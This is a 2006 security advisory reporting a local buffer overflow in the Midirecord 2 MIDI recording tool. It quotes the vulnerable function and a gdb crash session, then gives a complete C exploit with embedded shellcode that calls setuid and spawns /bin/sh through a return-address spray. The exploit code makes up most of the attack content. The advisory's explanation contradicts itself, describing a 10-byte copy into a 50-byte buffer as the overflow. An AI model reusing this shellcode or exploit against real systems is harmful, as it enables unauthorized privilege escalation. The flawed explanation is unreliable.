Echo Security Advisory 2006.41

`ECHO_ADV_41$2006  
  
---------------------------------------------------------------------------  
[ECHO_ADV_41$2006] BufferOverflow in Midirecord2  
---------------------------------------------------------------------------  
  
Author : Dedi Dwianto  
Date : July, 25th 2006  
Location : Indonesia, Jakarta  
Web : http://advisories.echo.or.id/adv/adv41-theday-2006.txt  
Exploitation : Local   
Critical Lvl : High  
---------------------------------------------------------------------------  
  
Affected software description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
  
Application : Midirecord  
version : 2  
URL : http://tuma.stc.cx/progs.php  
Description :  
Midirecord is a simple command-line application to record a MIDI file with your   
MIDI keyboard. It also features automatic recording to a MIDI file when you play   
electric piano, and thus it may be used as a "recording daemon".  
  
---------------------------------------------------------------------------  
  
Vulnerability:  
~~~~~~~~~~~~~~~~  
The function daemon in affected by a bufferoverflow which could allow  
an attacker to execute malicious code from local.  
The problem is caused by the copyung of a string of max 10 bytes in the filename  
buffer of only 50 bytes.  
  
------------------midirecord.cc-----------------------------  
void daemon(FILE* fin)  
{  
char filename[50];  
printf("Waiting for note-on event.\n");  
while(cont)  
{  
unsigned char status;  
fread(&status, 1, 1, fin); // read status  
if(status>>4 == 0x9)  
{  
get_datestr(filename);  
printf("Starting to record to %s.\n",filename);  
recordmidi(fin, filename);  
if(cont)  
printf("Finished. Starting to wait for note-on event.\n");  
}  
}  
  
}  
----------------------------------------------------------  
  
POC:  
~~~~  
$gdb midirecord  
GNU gdb 6.3-debian  
Copyright 2004 Free Software Foundation, Inc.  
GDB is free software, covered by the GNU General Public License, and you are  
welcome to change it and/or distribute copies of it under certain conditions.  
Type "show copying" to see the conditions.  
There is absolutely no warranty for GDB. Type "show warranty" for details.  
This GDB was configured as "i486-linux-gnu"...Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".  
  
(gdb) r `perl -e 'print "A" x 10000'`  
The program being debugged has been started already.  
Start it from the beginning? (y or n) y  
  
Starting program: /tmp/midirecord2c/midirecord `perl -e 'print "A" x 10000'`  
Waiting for note-on event.  
  
Program received signal SIGSEGV, Segmentation fault.  
0xb7dcb4b0 in fread () from /lib/tls/i686/cmov/libc.so.6  
(gdb)  
  
-------Exploit Code-------  
/* Succesfull Exploit in Ubuntu Breezey */  
#include <stdio.h>  
#include <string.h>  
#include <unistd.h>  
  
#define BUFSIZE 225  
#define ALIGNMENT 1  
int main(int argc, char **argv )  
{  
char shellcode[]=  
"\x6a\x17\x58\x31\xdb\xcd\x80"  
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80";  
  
if(argc < 2)  
{  
fprintf(stderr, "Use : %s <path_to_vuln>\n", argv[0]);  
return 0;  
}  
char *env[] = {shellcode, NULL};  
char buf[BUFSIZE];  
int i;  
int *ap = (int *)(buf + ALIGNMENT);  
int ret = 0xbffffffa - strlen(shellcode) - strlen(argv[1]);  
  
for (i = 0; i < BUFSIZE - 4; i += 4)  
*ap++ = ret;  
execle(argv[1], "/dev/midi1", buf, NULL, env);  
  
}  
  
---------------------------------------------------------------------------  
Shoutz:  
~~~~~~~  
  
~ y3dips,moby,comex,z3r0byt3,K-158,c-a-s-e,S`to,lirva32,anonymous  
~ My Lovely Jessy  
~ [email protected]  
~ #aikmel #e-c-h-o @irc.dal.net  
---------------------------------------------------------------------------  
Contact:  
~~~~~~~~  
  
Dedi Dwianto || echo|staff || the_day[at]echo[dot]or[dot]id  
Homepage: http://theday.echo.or.id/  
  
-------------------------------- [ EOF ] ----------------------------------  
`